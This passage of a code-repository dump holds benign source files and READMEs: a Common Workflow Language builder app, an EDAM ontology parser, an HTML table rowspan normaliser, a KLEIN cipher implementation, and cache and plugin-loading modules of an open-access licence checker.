+= \" format: \" + this.inputs[i].format + \"\\n\";\n\n if (this.inputs[i].type == \"File\" && this.inputs[i].secondaryFiles.length > 0) {\n result += \" secondaryFiles:\\n\";\n var j;\n for (j = 0; j < this.inputs[i].secondaryFiles.length; j++)\n result += this.indent(6, \"- \" + this.inputs[i].secondaryFiles[j]) + \"\\n\";\n }\n\n if (this.inputs[i].type == \"Output_File\" && this.inputs[i].secondaryFiles.length > 0) {\n doc += \";secondaryFiles: \" + this.inputs[i].secondaryFiles.join(\",\");\n }\n\n result += \" doc: |-\\n\" + this.indent(6, doc) + \"\\n\";\n }\n\n return result;\n },\n parseAuxiliaryFiles: function() {\n result = \"\";\n if (this.auxiliary_files.length > 0)\n result = \" InitialWorkDirRequirement:\\n listing:\\n\"\n\n var i;\n for (i = 0; i<this.auxiliary_files.length; i++)\n {\n result += ` - entryname: ${this.auxiliary_files[i].name}\\n`\n result += \" entry: |-\\n\"\n result += this.indent(8, this.auxiliary_files[i].contents) + \"\\n\";\n }\n\n return result;\n },\n parseOutputs: function() {\n result = \"\";\n var i;\n for (i = 0; i<this.inputs.length; i++)\n {\n if (this.inputs[i].type != \"Output_File\")\n continue;\n\n result += ` ${this.inputs[i].name}:\\n`;\n result += \" type: File\\n\";\n result += \" outputBinding:\\n\";\n result += \" glob: \\\"$(inputs.\" + this.inputs[i].name + \")\\\"\\n\";\n result += \" doc: |-\\n\";\n result += ` Output file matching the name specified in the \"${this.inputs[i].name}\" input.\\n`;\n\n if (this.inputs[i].format != \"\")\n result += \" format: \" + this.inputs[i].format + \"\\n\";\n\n if (this.inputs[i].secondaryFiles.length > 0)\n {\n result += \" secondaryFiles:\\n\";\n var j;\n for (j = 0; j < this.inputs[i].secondaryFiles.length; j++)\n result += this.indent(6, \"- \" + this.inputs[i].secondaryFiles[j]) + \"\\n\";\n }\n }\n\n var i;\n for (i = 0; i<this.outputs.length; i++)\n {\n result += ` ${this.outputs[i].ID}:\\n`;\n result += \" type: File\\n\";\n result += \" outputBinding:\\n\";\n result += \" glob: \\\"\" + this.outputs[i].glob + \"\\\"\\n\";\n result += \" doc: |-\\n\";\n result += this.indent(6, this.outputs[i].doc) + \"\\n\";\n\n if (this.outputs[i].format != \"\")\n result += \" format: \" + this.outputs[i].format + \"\\n\";\n\n if (this.outputs[i].secondaryFiles.length > 0)\n {\n result += \" secondaryFiles:\\n\";\n var j;\n for (j = 0; j < this.outputs[i].secondaryFiles.length; j++)\n result += this.indent(6, \"- \" + this.outputs[i].secondaryFiles[j]) + \"\\n\";\n }\n }\n\n return result;\n },\n parseStandardMessages: function() {\n result = \"\";\n\n stdout_value = this.stdout_file_name.trim();\n stderr_value = this.stderr_file_name.trim();\n\n if (stdout_value != \"\")\n result += \" standard_output:\\n type: stdout\\n format: edam:format_1964\\n\";\n if (stderr_value != \"\")\n result += \" standard_error:\\n type: stderr\\n format: edam:format_1964\\n\";\n if (stdout_value != \"\")\n result += \"stdout: \" + stdout_value + \"\\n\";\n if (stderr_value != \"\")\n result += \"stderr: \" + stderr_value + \"\\n\";\n\n return result;\n },\n parseAuthorInfo() {\n author_info = \"\";\n if (this.author_name.trim() != \"\" || this.author_orcid.trim() != \"\") {\n author_info += \" \\ns:author:\\n\";\n author_info += \" - class: s:Person\\n\";\n\n if (this.author_name.trim() != \"\")\n author_info += ` s:name: ${this.author_name.trim()}\\n`;\n if (this.author_orcid.trim() != \"\")\n author_info += ` s:identifier: ${this.author_orcid.trim()}\\n`;\n author_info += \" \\n\";\n }\n\n return author_info;\n },\n buildOptionalString: function(prefix, value) {\n if (value == \"\")\n return \"\";\n else\n return prefix + value;\n },\n indent: function(numSpaces, value) {\n if (value == \"\")\n return \"\";\n\n prefix = \"\";\n var i;\n for (i = 0; i < numSpaces; i++)\n prefix += \" \";\n\n lines = value.split(\"\\n\");\n result = \"\";\n\n for (i = 0; i < lines.length; i++)\n {\n result += prefix + lines[i];\n if (i != (lines.length - 1))\n result += \"\\n\";\n }\n\n return result;\n },\n downloadCwl: function() {\n this.downloadFile(this.cwl_file_name, this.cwl);\n },\n downloadJob: function() {\n this.downloadFile(this.job_file_name, this.job);\n },\n downloadFile: function(fileName, contents) {\n //https://ourcodeworld.com/articles/read/189/how-to-create-a-file-and-generate-a-download-with-javascript-in-the-browser-without-a-server\n var element = document.createElement('a');\n element.setAttribute('href', 'data:text/plain;charset=utf-8,' + encodeURIComponent(contents));\n element.setAttribute('download', fileName);\n element.style.display = 'none';\n document.body.appendChild(element);\n element.click();\n document.body.removeChild(element);\n },\n getTodayDate: function() {\n var d = new Date();\n return [\n d.getFullYear(),\n ('0' + (d.getMonth() + 1)).slice(-2),\n ('0' + d.getDate()).slice(-2)\n ].join('-');\n },\n isValidORCID: function(orcid) {\n return (/https:\\/\\/orcid.org\\/\\d{4}-\\d{4}-\\d{4}-\\d{4}/.test(orcid));\n }\n }\n });\n</script>\n\n</body>\n</html>\n"
},
{
"alpha_fraction": 0.6251758337020874,
"alphanum_fraction": 0.6350210905075073,
"avg_line_length": 31.31818199157715,
"blob_id": "29388d470853cbee797e61f227e21cfb4c511089",
"content_id": "1dde5d824cee3d426b5932c3f15c83d251e74ced",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1422,
"license_type": "permissive",
"max_line_length": 107,
"num_lines": 44,
"path": "/Parse_EDAM.py",
"repo_name": "srp33/ToolJig",
"src_encoding": "UTF-8",
"text": "import requests\n\nurl = \"http://edamontology.org/EDAM_1.23.tsv\"\n\nedam_content = requests.get(url, allow_redirects=True).content.decode()\n\nheader_items = edam_content.split(\"\\n\")[0].split(\"\\t\")\nobsolete_index = header_items.index(\"Obsolete\")\nprefix_index = header_items.index(\"http://data.bioontology.org/metadata/prefixIRI\")\nlabel_index = header_items.index(\"Preferred Label\")\ndef_index = header_items.index(\"Definitions\")\n\nout_dict = {}\n\nfor line in edam_content.split(\"\\n\")[1:]:\n line_items = line.split(\"\\t\")\n if len(line_items) < 2:\n continue\n\n is_obsolete = line_items[obsolete_index] == \"TRUE\"\n the_format = line_items[prefix_index]\n is_format = the_format.startswith(\"format_\")\n\n if not is_format or is_obsolete:\n continue\n\n label = line_items[label_index]\n definition = line_items[def_index].replace(\"\\\"\", \"\").split(\"|\")[0]\n\n if len(definition) > 77:\n definition = definition[:77]\n definition = \" \".join(definition.split(\" \")[:-1]) + \"...\"\n\n description = f\"{label} - {definition}\"\n\n out_dict[label] = f\" <option value=\\\"edam:{the_format}\\\">{description}</option>\"\n\nout_lines = [out_dict[label] for label in sorted(out_dict, key=str.casefold)]\n\nout_lines.insert(0, out_dict.pop(\"plain text format (unformatted)\"))\nout_lines.insert(0, f\" <option value=\\\"\\\"></option>\")\n\nfor line in out_lines:\n print(line)\n"
},
{
"alpha_fraction": 0.7957446575164795,
"alphanum_fraction": 0.7957446575164795,
"avg_line_length": 46,
"blob_id": "c026a71aa879674f3e038a1bad8d549f67ede230",
"content_id": "7e90ae3a11e5eb2b3c36784597aa5609055351d0",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 235,
"license_type": "permissive",
"max_line_length": 147,
"num_lines": 5,
"path": "/examples/README.md",
"repo_name": "srp33/ToolJig",
"src_encoding": "UTF-8",
"text": "## Examples\n\nThis directory contains example CWL tool descriptions and input-object files. The `run` scripts illustrate how to execute them at the command line.\n\nPlease note the terms of use listed for the `workflows/somatic` example.\n"
},
{
"alpha_fraction": 0.787104606628418,
"alphanum_fraction": 0.8004866242408752,
"avg_line_length": 90.33333587646484,
"blob_id": "75a874fd112f73834eedf31057454169d3611747",
"content_id": "be2be7bdde65fde35686711c3224e67634cc409c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 822,
"license_type": "permissive",
"max_line_length": 405,
"num_lines": 9,
"path": "/README.md",
"repo_name": "srp33/ToolJig",
"src_encoding": "UTF-8",
"text": "# ToolJig: An app for building simplified Common Workflow Language tool and workflow descriptions\n\nToolJig is an HTML/CSS/Javascript application that enables researchers to create [Common Workflow Language](https://www.commonwl.org) (CWL) tool and workflow descriptions in an interactive manner. You can read more about ToolJig and the motivations behind it in our journal article, [Simplifying the development of portable, scalable, and reproducible workflows](https://elifesciences.org/articles/71069).\n\nYou can use the app for building CWL tools [here](https://srp33.github.io/ToolJig/tool.html).\n\nYou can use the app for building CWL workflows [here](https://srp33.github.io/ToolJig/workflow.html).\n\nYou can see example CWL documents in the [examples](https://github.com/srp33/ToolJig/tree/master/examples) directory.\n"
},
{
"alpha_fraction": 0.800000011920929,
"alphanum_fraction": 0.800000011920929,
"avg_line_length": 224,
"blob_id": "fc31f93f01446ce83a5d56f4835fa4982556f66c",
"content_id": "60410541dd57288b791a40fa6daa45d18f62c1e5",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 225,
"license_type": "permissive",
"max_line_length": 224,
"num_lines": 1,
"path": "/examples/workflows/somatic/Archive/README.md",
"repo_name": "srp33/ToolJig",
"src_encoding": "UTF-8",
"text": "I am keeping these files for archival purposes. It includes an earlier version of the command-line tools and `run` script for calling somatic variants. However, this version is a \"less effective\" way of invoking these tools.\n"
},
{
"alpha_fraction": 0.7859712243080139,
"alphanum_fraction": 0.7979616522789001,
"avg_line_length": 110.19999694824219,
"blob_id": "0cc06858151e6ce6b1f1be50f052619153e837c3",
"content_id": "d82da58c76d310dd0d04557d05d3e37d2373aca5",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1668,
"license_type": "permissive",
"max_line_length": 576,
"num_lines": 15,
"path": "/examples/workflows/somatic/README.md",
"repo_name": "srp33/ToolJig",
"src_encoding": "UTF-8",
"text": "## Overview\n\nThis directory provides scripts for calling somatic variants in tumor DNA sequencing data. It includes command-line tools for completing these steps and a workflow that ties them all together.\n\n## Data terms of use\n\nThese examples use data from the Texas Cancer Research Biobank (http://txcrb.org). You can read more about the data here: https://www.nature.com/articles/sdata201610. In these examples, the data are downloaded from the Sequence Read Archive (https://trace.ncbi.nlm.nih.gov/Traces/sra/?run=SRR2187293 and https://trace.ncbi.nlm.nih.gov/Traces/sra/?run=SRR2187298) where they are publicly accessible. However, the data are subject to the data-use restrictions listed below. By downloading or utilizing any part of this dataset, you must agree to the following conditions of use:\n\n* No attempt to identify any specific individual represented by these data or any derivatives of these data will be made.\n* No attempt will be made to compare and/or link this public data set or derivatives in part or in whole to private health information.\n* These data in part or in whole may be freely downloaded, used in analyses and repackaged in databases.\n* Redistribution of any part of these data or any material derived from the data will include a copy of this notice.\n* The data are intended for use as learning and/or research tools only.\n* This data set is not intended for direct profit of anyone who receives it and may not be resold.\n* Users are free to use the data in scientific publications if the providers of the data (Texas Cancer Research Biobank and Baylor College of Medicine Human Genome Sequencing Center) are properly acknowledged.\n"
},
{
"alpha_fraction": 0.8028169274330139,
"alphanum_fraction": 0.8028169274330139,
"avg_line_length": 141,
"blob_id": "728ea2d9013b667f0c14b59bad52ea14b51da6aa",
"content_id": "5371770ba74db2a0549f561a8091d580dd176ccc",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 142,
"license_type": "permissive",
"max_line_length": 141,
"num_lines": 1,
"path": "/Logo_credit.md",
"repo_name": "srp33/ToolJig",
"src_encoding": "UTF-8",
"text": "Image credit: [Orsolya Vékony](https://unsplash.com/@vekonyorsi?utm_medium=referral&utm_campaign=photographer-credit&utm_content=creditBadge)\n"
}
] | 7 |
mclose/cli-pipeline-tools | https://github.com/mclose/cli-pipeline-tools | b4f199af895cf45a1a63495a74e2302abf121d11 | 311ec9ed1d111aecaf9c2c8780395ae1352fd76e | bee9a4d81c20debc9a7f658ea655320f26d7137b | refs/heads/master | 2021-01-10T07:30:41.793373 | 2016-01-22T19:19:38 | 2016-01-22T19:19:38 | 50,201,771 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.761904776096344,
"alphanum_fraction": 0.761904776096344,
"avg_line_length": 20,
"blob_id": "da7486d0eb2b6463ed1a71fe0212e9151a59c940",
"content_id": "379738315c83fa0c94e39a310ea78649bda9dd11",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 21,
"license_type": "no_license",
"max_line_length": 20,
"num_lines": 1,
"path": "/README.md",
"repo_name": "mclose/cli-pipeline-tools",
"src_encoding": "UTF-8",
"text": "# cli-pipeline-tools\n"
},
{
"alpha_fraction": 0.6117533445358276,
"alphanum_fraction": 0.6160886287689209,
"avg_line_length": 38.92307662963867,
"blob_id": "ac433d2a57348ce22ad785d249efc9521f9df657",
"content_id": "22be6ec567bc760bd267b27e1c13b1db46d646b5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2076,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 52,
"path": "/normalize-rows.py",
"repo_name": "mclose/cli-pipeline-tools",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Remove rowspans from all tables in a page\n# Should probably expand this to deal with colspans too\n# Should also copy full tag contents from the first rowspan to\n# subsequent rows.\n# Example:\n# curl -s 'https://en.wikipedia.org/wiki/List_of_2015_albums' | normalize-rows.py\n\nfrom bs4 import BeautifulSoup\nimport sys\nimport argparse\n\ndef fix_rows_with_rowspan(rows, column, contents):\n \"\"\"delete the rowspan from the first row\"\"\"\n del(rows[0].find_all('td')[column]['rowspan'])\n \"\"\"Copy the contents of the rowspan down through the slice of rows from the caller\"\"\"\n \"\"\"Ignore the first row because the contents are already there\"\"\"\n for row_number, row in enumerate(rows):\n if row_number != 0:\n row.find_all('td')[column].contents = contents\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('html', nargs='?', type=argparse.FileType('rb'),\n default=sys.stdin, help=\"HTML from pipeline\", metavar=\"HTML\")\n args = parser.parse_args()\n \n html = BeautifulSoup(args.html.read(), \"html.parser\")\n rows = html.find_all('tr')\n for row_number, row in enumerate(rows):\n \"\"\"Check for rowspan in row\"\"\"\n tr_with_rowspan = row.find_all('td', rowspan=True) \n if tr_with_rowspan:\n \"\"\"if the row has a rowspan, identify the column/td it is in\"\"\"\n for column_number, td in enumerate(tr_with_rowspan):\n if td.has_attr('rowspan'):\n rowspan_value = int(td['rowspan'])\n contents = td.contents\n \"\"\"Take a slice of rows covered by the rowspan\"\"\"\n \"\"\"The rowspan will be the first item in the list sent to fix_rows_with_rowspan\"\"\"\n fix_rows_with_rowspan(rows[row_number:(row_number + rowspan_value)], column_number, contents)\n\n result = str(html)\n try:\n sys.stdout.write(result + \"\\n\")\n sys.stdout.flush()\n except IOError:\n pass\n\nif __name__ == \"__main__\":\n exit(main())\n"
}
] | 2 |
gagan2005/termpaper | https://github.com/gagan2005/termpaper | d5024898650f3e1dc2a389418e60f6603b9d59e1 | 19e7b1c682dd749d015a77df0ea624699639258e | 0787bca2fa87ac425bb570729eef20eeaa9f89dc | refs/heads/master | 2023-01-24T12:16:46.997178 | 2020-11-28T04:07:12 | 2020-11-28T04:07:12 | 311,726,299 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.49671533703804016,
"alphanum_fraction": 0.5697080492973328,
"avg_line_length": 26.959182739257812,
"blob_id": "2e87f319ae6bcde46e083a7ea22c4c89a6afa25a",
"content_id": "ae40a0c2792ebf7afa55f2bc5f25956678acbd52",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2740,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 98,
"path": "/code/klein.py",
"repo_name": "gagan2005/termpaper",
"src_encoding": "UTF-8",
"text": "# TODO: testing of encryption\n\n\nSBOX = [0x7, 0x4, 0xA, 0x9, 0x1, 0xF, 0xB, 0x0,\n 0xC, 0x3, 0x2, 0x6, 0x8, 0xE, 0xD, 0x5]\n\n\ndef round_function(state, round_key, round_no, n):\n state = AddRoundKey(state, round_key, n)\n state = SubNibbles(state, n)\n state = RotateNibbles(state, n)\n state = MixNibbles(state)\n next_round_key = KeySchedule(round_key, round_no, n)\n print(\"sk=\", next_round_key)\n return state, next_round_key\n\n\ndef AddRoundKey(state, round_key, n):\n to_be_removed = n - 64\n state = state ^ (round_key >> to_be_removed)\n return state & (0xFFFFFFFFFFFFFFFF)\n\n\ndef substitue(state, i, n):\n offset = n - (i+1)*4\n nibble = (state >> offset) & 0xF\n return (state & ~(0xF << offset) | (SBOX[nibble] << offset))\n\n\ndef SubNibbles(state, n):\n for i in range(16):\n state = substitue(state, i, n)\n return state\n\n\ndef RotateNibbles(state, n):\n state = ((state << 16) | (state >> 48)) & 0xFFFFFFFFFFFFFFFF\n return state\n\ndef mul2or3(x, n): # this is not nearly as generic as galoisMult\n x = (x << 1) if n == 2 else ((x << 1) ^ x)\n if x > 0xFF:\n return (x ^ 0x1B) & 0xFF\n return x\n\n\ndef MixCols(half_state):\n mask = 0xFF\n z01 = (half_state >> 24) & mask\n z23 = (half_state >> 16) & mask\n z45 = (half_state >> 8) & mask\n z67 = half_state & mask\n\n c01 = mul2or3(z01, 2) ^ mul2or3(z23, 3) ^ z45 ^ z67\n c23 = z01 ^ mul2or3(z23, 2) ^ mul2or3(z45, 3) ^ z67\n c45 = z01 ^ z23 ^ mul2or3(z45, 2) ^ mul2or3(z67, 3)\n c67 = mul2or3(z01, 3) ^ z23 ^ z45 ^ mul2or3(z67, 2)\n return c01 << 24 | c23 << 16 | c45 << 8 | c67\n\n\ndef MixNibbles(state):\n c1 = MixCols(state >> 32)\n mask0 = 0xFFFFFFFF\n c0 = MixCols(state & mask0)\n return (c1 << 32) | c0\n\n\ndef KeySchedule(prev_key, round_no, n):\n a = prev_key >> n//2\n b = prev_key & int('1' * (n//2), 2)\n a_dash = ((a << 8) | (a >> (n//2-8))) & int('F'*(n//8), 16)\n b_dash = ((b << 8) | (b >> (n//2-8))) & int('F'*(n//8), 16)\n a_dash_dash = b_dash\n b_dash_dash = a_dash ^ b_dash\n a_dash_dash = a_dash_dash ^ (round_no << (n//2 - 24))\n for i in range(2, 6):\n b_dash_dash = substitue(b_dash_dash, i, n//2)\n return (a_dash_dash << n//2) | b_dash_dash\n\n\n\n\ndef KLEIN_encrypt(plaintext, key_len, nof_rounds, init_key):\n state = plaintext\n round_key = init_key\n for i in range(1, nof_rounds+1):\n state, round_key = round_function(state, round_key, i, key_len)\n state = AddRoundKey(state, round_key, key_len)\n return state\n\n\nif __name__ == \"__main__\":\n plaintext = int('1234567890ABCDEF', 16)\n init_key = int('0000000000000000', 16)\n key_len = 64\n nof_rounds = 12\n enc = KLEIN_encrypt(plaintext, key_len, nof_rounds, init_key)\n print(enc)\n"
},
{
"alpha_fraction": 0.7633333206176758,
"alphanum_fraction": 0.7716666460037231,
"avg_line_length": 41.85714340209961,
"blob_id": "989d5c96caab2ca7b4d1194b1045fa38817d55ba",
"content_id": "8b53212f1f78cf73db48701431d5bc323cecf775",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 600,
"license_type": "no_license",
"max_line_length": 158,
"num_lines": 14,
"path": "/README.md",
"repo_name": "gagan2005/termpaper",
"src_encoding": "UTF-8",
"text": "# KLEIN cipher\n\nKLEIN implemnetation(python code) is pesent in **code** folder. You can simply change the plaintext and init key in the code and execute to get encrpted text.\n<br>\ncommmand: python klein.py \n<br>\n\nTerm paper latex code is written in **term-paper.tex** and the pdf is also named as **term-paper.pdf**.\n\nAll the code and slides related to ppt are included in **presentation folder**.\nAll diagrams used are kept in **images** folder.\nThe refernces used are listed citations.bib\n\nVideo-presentation link: https://drive.google.com/file/d/1eIdL9sCG4BImoZ9JO2TfbYkppyYXIUxt/view?usp=sharing\n"
}
] | 2 |
rossmounce/OpenArticleGauge | https://github.com/rossmounce/OpenArticleGauge | 14a7092be5e52c93979d5905419c480d7681c639 | 5d8d3e1c4b52d6c4d1f5976437dbd52e71ac50b8 | 3654a56fc6dabd3c6ea9810460f216e698a6c230 | refs/heads/master | 2021-01-16T18:41:23.974022 | 2013-04-15T15:08:25 | 2013-04-15T15:08:25 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7886435389518738,
"alphanum_fraction": 0.7886435389518738,
"avg_line_length": 78.25,
"blob_id": "2ea383f4b10227366c629c33542296d713f2e91e",
"content_id": "e8780367345674c5631ffad2b7fdf2473c7d4a58",
"detected_licenses": [
"BSD-3-Clause",
"CC-BY-4.0",
"CC-BY-3.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 317,
"license_type": "permissive",
"max_line_length": 160,
"num_lines": 4,
"path": "/openarticlegauge/tests/run_content_plugin_tests.sh",
"repo_name": "rossmounce/OpenArticleGauge",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n# If you are running in a virtualenv, activate it before invoking this script.\n# Also update the script if you add any tests for content plugins.\nnosetests test_bmc.py test_cell_reports.py test_elife.py test_example_basic_string_matcher.py test_hindawi.py test_oup.py test_plos.py test_provider_skeleton.py\n"
},
{
"alpha_fraction": 0.4552438259124756,
"alphanum_fraction": 0.4552438259124756,
"avg_line_length": 29.191919326782227,
"blob_id": "3ccc9b12143e0a2e291a76db8d41343d28b58b5d",
"content_id": "eaaef8cbd9a13b107ef62636e30f0bf6ffdaeeed",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2994,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 99,
"path": "/openarticlegauge/recordmanager.py",
"repo_name": "rossmounce/OpenArticleGauge",
"src_encoding": "UTF-8",
"text": "from openarticlegauge import config\nfrom datetime import datetime\n\ndef record_provider_url(record, url):\n if not \"provider\" in record:\n record['provider'] = {}\n if not \"url\" in record[\"provider\"]:\n record[\"provider\"][\"url\"] = []\n if url not in record['provider']['url']:\n record['provider']['url'].append(url)\n \ndef record_provider_urls(record, urls):\n for url in urls:\n record_provider_url(record, url)\n\ndef record_provider_doi(record, doi):\n if not \"provider\" in record:\n record['provider'] = {}\n record[\"provider\"][\"doi\"] = doi\n \ndef add_license(record,\n description=\"\",\n title=\"\",\n url=\"\",\n version=\"\",\n jurisdiction=\"\",\n type=\"\",\n open_access=False,\n BY=\"\",\n NC=\"\",\n ND=\"\",\n SA=\"\",\n error_message=\"\",\n suggested_solution=\"\",\n category=\"\",\n provenance_description=\"\",\n agent=config.agent,\n source=\"\",\n date=datetime.strftime(datetime.now(), config.date_format),\n handler=\"\",\n handler_version=\"\"):\n \"\"\"\n {\n \"description\": \"\",\n \"title\": \"\",\n \"url\": licence_url,\n \"version\": \"\",\n \"jurisdiction\": \"\",\n \"type\": \"failed-to-obtain-license\",\n \"open_access\": False,\n \"BY\": \"\",\n \"NC\": \"\",\n \"ND\": \"\",\n \"SA\": \"\",\n \"error_message\": why,\n \"suggested_solution\": suggested_solution,\n \"provenance\": {\n \"category\": \"page_scrape\",\n \"description\": self.gen_provenance_description_fail(source_url),\n \"agent\": config.agent,\n \"source\": source_url,\n \"date\": datetime.strftime(datetime.now(), config.date_format),\n \"handler\" : self._short_name,\n \"handler_version\" : self.__version__\n }\n }\n \"\"\"\n \n if \"bibjson\" not in record:\n record[\"bibjson\"] = {}\n if \"license\" not in record['bibjson']:\n record['bibjson']['license'] = []\n \n record['bibjson']['license'].append(\n {\n \"description\": description,\n \"title\": title,\n \"url\": url,\n \"version\": version,\n \"jurisdiction\": jurisdiction,\n \"type\": type,\n \"open_access\": open_access,\n \"BY\": BY,\n \"NC\": NC,\n \"ND\": ND,\n \"SA\": SA,\n \"error_message\": error_message,\n \"suggested_solution\": suggested_solution,\n \"provenance\": {\n \"category\": category,\n \"description\": provenance_description,\n \"agent\": agent,\n \"source\": source,\n \"date\": date,\n \"handler\" : handler,\n \"handler_version\" : handler_version\n }\n }\n )\n \n"
},
{
"alpha_fraction": 0.6182937622070312,
"alphanum_fraction": 0.6191732883453369,
"avg_line_length": 33.79787063598633,
"blob_id": "1ca721b43ef06409029eae9640cca20a3d59cc1d",
"content_id": "a379e4083ae264d1ae6d1ea749490412fc7bbd02",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3411,
"license_type": "permissive",
"max_line_length": 116,
"num_lines": 94,
"path": "/openarticlegauge/cache.py",
"repo_name": "rossmounce/OpenArticleGauge",
"src_encoding": "UTF-8",
"text": "import redis, json, datetime, logging\nimport config\n\nlog = logging.getLogger(__name__)\n\ndef check_cache(key):\n \"\"\"\n check the cache for an object stored under the given key, and convert it\n from a string into a python object\n \"\"\"\n client = redis.StrictRedis(host=config.REDIS_CACHE_HOST, port=config.REDIS_CACHE_PORT, db=config.REDIS_CACHE_DB)\n s = client.get(key)\n \n if s is None:\n return None\n \n try:\n obj = json.loads(s)\n except ValueError as e:\n # cache is corrupt, just get rid of it\n invalidate(key)\n return None\n \n return obj\n \ndef is_stale(bibjson):\n \"\"\"\n Check to see if the bibjson record in the supplied record is stale. Look\n in bibjson['license'][n]['provenance']['date'] for all n. If the newest date\n is older than the stale time, then the record is stale. If the record does\n not have a licence, it is stale.\n \"\"\"\n # check that the record has a licence at all\n if not \"license\" in bibjson:\n return True\n \n # get the date strings of all the licences\n log.debug(\"stale check on: \" + str(bibjson))\n date_strings = [licence.get(\"provenance\", {}).get(\"date\") \n for licence in bibjson.get(\"license\", []) \n if licence.get(\"provenance\", {}).get(\"date\") is not None]\n \n # check that there were any dates, if not then the record is necessarily stale\n if len(date_strings) == 0:\n return True\n \n # convert all the viable date strings to datetimes\n dates = []\n for d in date_strings:\n try:\n dt = datetime.datetime.strptime(d, config.date_format)\n dates.append(dt)\n except ValueError as e:\n continue\n \n # check that at least one date has parsed, and if not assume that the record is stale\n if len(dates) == 0:\n return True\n \n # get the most recent date by sorting the list (reverse, most recent date first)\n dates.sort(reverse=True)\n most_recent = dates[0]\n \n # now determine if the most recent date is older or newer than the stale timeout\n td = datetime.timedelta(seconds=config.licence_stale_time)\n n = datetime.datetime.now()\n stale_date = most_recent + td\n return stale_date < n\n \ndef invalidate(key):\n \"\"\"\n remove anything identified by the supplied key from the cache\n \"\"\"\n client = redis.StrictRedis(host=config.REDIS_CACHE_HOST, port=config.REDIS_CACHE_PORT, db=config.REDIS_CACHE_DB)\n client.delete(key)\n \ndef cache(key, obj):\n \"\"\"\n take the provided python data structure, serialise it via json to a string, and\n store it at the provided key with the appropriate timeout. This may be\n required to create a new cache entry or update an existing one\n \"\"\"\n try:\n s = json.dumps(obj)\n except TypeError:\n raise CacheException(\"can only cache python objects that can be sent through json.dumps\")\n \n client = redis.StrictRedis(host=config.REDIS_CACHE_HOST, port=config.REDIS_CACHE_PORT, db=config.REDIS_CACHE_DB)\n client.setex(key, config.REDIS_CACHE_TIMEOUT, s)\n \nclass CacheException(Exception):\n def __init__(self, message):\n self.message = message\n super(CacheException, self).__init__(self, message)\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n"
},
{
"alpha_fraction": 0.611611008644104,
"alphanum_fraction": 0.6142235398292542,
"avg_line_length": 34.15306091308594,
"blob_id": "9064a49e5c4290e1e12103d30592620326d819e3",
"content_id": "e5ed009c41261694c78be1a97df6f96f4c6cec59",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3445,
"license_type": "permissive",
"max_line_length": 134,
"num_lines": 98,
"path": "/openarticlegauge/plugloader.py",
"repo_name": "rossmounce/OpenArticleGauge",
"src_encoding": "UTF-8",
"text": "import config\nimport logging\n\nlog = logging.getLogger(__name__)\n\n\"\"\"\nNOTE: these might be useful to someone in the future, but we don't need them\nright now, so leaving them commented out\n\ndef get_info(callable_path):\n if callable_path is None:\n log.debug(\"attempted to load plugin with no plugin path\")\n return None\n \n # callable_path is a function in a module, and the module itself holds\n # the info, so we need to just load the module\n components = callable_path.split(\".\")\n modpath = \".\".join(components[:-1])\n \n if modpath == \"\" or modpath is None:\n return None, None\n \n # ok, so now we know the path to the module, load it\n module = load(modpath)\n \n name = \"unknown\"\n version = -1\n if hasattr(module, \"__name__\"):\n name = module.__name__.split(\".\")[-1]\n if hasattr(module, \"__version__\"):\n version = module.__version__\n \n return name, version\n \ndef load_sibling(callable_path, sibling_name):\n if callable_path is None:\n log.debug(\"attempted to load plugin with no plugin path\")\n return None\n \n components = callable_path.split(\".\")\n call = components[-1:][0]\n modpath = \".\".join(components[:-1])\n \n # construct the new callable\n sibling = modpath + \".\" + sibling_name\n return load(sibling)\n\"\"\"\n\ndef load(callable_path):\n if callable_path is None:\n log.debug(\"attempted to load plugin with no plugin path\")\n return None\n \n # split out the callable and the modpath\n components = callable_path.split(\".\")\n call = components[-1:][0]\n modpath = \".\".join(components[:-1])\n log.debug(\"loading plugin from modpath: \" + modpath + \", and callable: \" + call)\n \n if modpath is not None and modpath != \"\":\n # try to load the callable\n call_able = _load_callable(modpath, call)\n \n # if success then return\n if call_able is not None:\n log.debug(\"loaded plugin from \" + modpath + \": \" + str(call_able))\n return call_able\n \n # if we don't find the callable, then we may need to look in one of the \n # other search contexts as defined in the config\n for search_prefix in config.module_search_list:\n nm = search_prefix + \".\" + modpath\n call_able = _load_callable(nm, call)\n if call_able is not None:\n log.debug(\"loaded plugin from \" + modpath + \": \" + str(call_able))\n return call_able\n \n # couldn't load a plugin\n log.debug(\"unable to load plugin \" + call + \" from \" + modpath)\n return None\n\ndef 